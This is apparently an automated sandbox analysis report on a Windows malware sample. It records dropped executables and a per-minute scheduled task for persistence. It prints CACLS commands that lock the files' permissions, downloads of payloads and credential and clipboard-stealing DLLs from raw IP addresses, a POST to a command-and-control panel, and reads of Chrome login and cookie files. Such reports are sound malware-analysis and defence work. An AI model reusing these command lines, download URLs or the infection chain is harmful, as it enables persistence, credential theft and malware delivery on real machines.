Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | July 27, 2023, 10:24 a.m. | July 27, 2023, 10:26 a.m. |
-
-
-
-
a7207637.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a7207637.exe
2172 -
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F
2856 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "pdates.exe" /P "test22:N"&&CACLS "pdates.exe" /P "test22:R" /E&&echo Y|CACLS "..\925e7e99c5" /P "test22:N"&&CACLS "..\925e7e99c5" /P "test22:R" /E&&Exit
2912-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3008 -
cacls.exe CACLS "pdates.exe" /P "test22:N"
3052 -
cacls.exe CACLS "pdates.exe" /P "test22:R" /E
2136 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2104 -
cacls.exe CACLS "..\925e7e99c5" /P "test22:N"
2040 -
cacls.exe CACLS "..\925e7e99c5" /P "test22:R" /E
2572
-
-
-
-
g2474962.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\g2474962.exe
2096 -
h0472691.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\h0472691.exe
2896
-
-
j6120486.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\j6120486.exe
524
-
-
-
-
k7404811.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\k7404811.exe
748 -
l7621037.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\l7621037.exe
3028
-
-
n6056764.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n6056764.exe
2140
-
-
-
ohcompetitive.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ohcompetitive.exe
2884
-
-
-
regsvr32.exe "C:\Windows\System32\regsvr32.exe" -U -S K1heT.2
2060
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
1692
-
-
-
-
c0646653.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c0646653.exe
2756
-
-
d4021112.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d4021112.exe
2808
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
Name | Response | Post-Analysis Lookup |
---|---|---|
files.catbox.moe | 108.181.20.35 |
Suricata Alerts
Suricata TLS
No Suricata TLS
pdb_path | wextract.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
resource name | AVI |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://77.91.68.61/rock/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.124.47/new/foto5566.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.124.47/new/fotod250.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.124.47/anon/an.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.68.248/fuzz/raman.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.68.61/rock/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.68.61/rock/Plugins/clip64.dll |
request | POST http://77.91.68.61/rock/index.php |
request | GET http://77.91.124.47/new/foto5566.exe |
request | GET http://77.91.124.47/new/fotod250.exe |
request | GET http://77.91.124.47/anon/an.exe |
request | GET http://77.91.68.248/fuzz/raman.exe |
request | GET http://77.91.68.61/rock/Plugins/cred64.dll |
request | GET http://77.91.68.61/rock/Plugins/clip64.dll |
request | POST http://77.91.68.61/rock/index.php |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\g2474962.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v7696680.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\k7404811.exe |
file | C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\y3938954.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x2150544.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n6056764.exe |
file | C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe |
file | C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\j6120486.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ohcompetitive.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c0646653.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\h0472691.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\l7621037.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v7318670.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a7207637.exe |
file | C:\Users\test22\AppData\Local\Temp\1000011051\an.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b6358658.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ohcompettitive.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d4021112.exe |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "pdates.exe" /P "test22:N"&&CACLS "pdates.exe" /P "test22:R" /E&&echo Y|CACLS "..\925e7e99c5" /P "test22:N"&&CACLS "..\925e7e99c5" /P "test22:R" /E&&Exit |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | "C:\Windows\System32\regsvr32.exe" -U -S K1heT.2 |
cmdline | regsvr32.exe -U -S K1heT.2 |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F |
file | C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe |
file | C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe |
file | C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe |
file | C:\Users\test22\AppData\Local\Temp\1000011051\an.exe |
file | C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ohcompetitive.exe |
file | C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe |
file | C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe |
file | C:\Users\test22\AppData\Local\Temp\k1het.2 |
file | C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe |
file | C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe |